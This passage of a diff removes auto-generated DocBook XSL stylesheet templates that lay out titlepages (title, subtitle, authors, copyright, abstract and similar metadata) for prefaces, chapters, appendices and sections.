- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="prefaceinfo/subtitle">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/corpauthor"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/authorgroup"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/author"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/othercredit"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/releaseinfo"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/copyright"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/legalnotice"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/pubdate"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/revision"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/revhistory"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/abstract"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="preface.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="preface.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="preface.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="preface.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="preface.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="preface.titlepage.before.recto"/>
- <xsl:call-template name="preface.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="preface.titlepage.before.verso"/>
- <xsl:call-template name="preface.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="preface.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="preface.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="preface.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.recto">
- <xsl:choose>
- <xsl:when test="chapterinfo/title">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="chapterinfo/subtitle">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/corpauthor"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/authorgroup"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/author"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/othercredit"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/releaseinfo"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/copyright"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/legalnotice"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/pubdate"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/revision"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/revhistory"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/abstract"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="chapter.titlepage.before.recto"/>
- <xsl:call-template name="chapter.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="chapter.titlepage.before.verso"/>
- <xsl:call-template name="chapter.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="chapter.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="chapter.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="chapter.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.recto">
- <xsl:choose>
- <xsl:when test="appendixinfo/title">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="appendixinfo/subtitle">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/corpauthor"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/authorgroup"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/author"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/othercredit"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/releaseinfo"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/copyright"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/legalnotice"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/pubdate"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/revision"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/revhistory"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/abstract"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="appendix.titlepage.before.recto"/>
- <xsl:call-template name="appendix.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="appendix.titlepage.before.verso"/>
- <xsl:call-template name="appendix.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="appendix.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="appendix.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="appendix.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="section.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sectioninfo/title">
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sectioninfo/subtitle">
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/corpauthor"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/corpauthor"/>
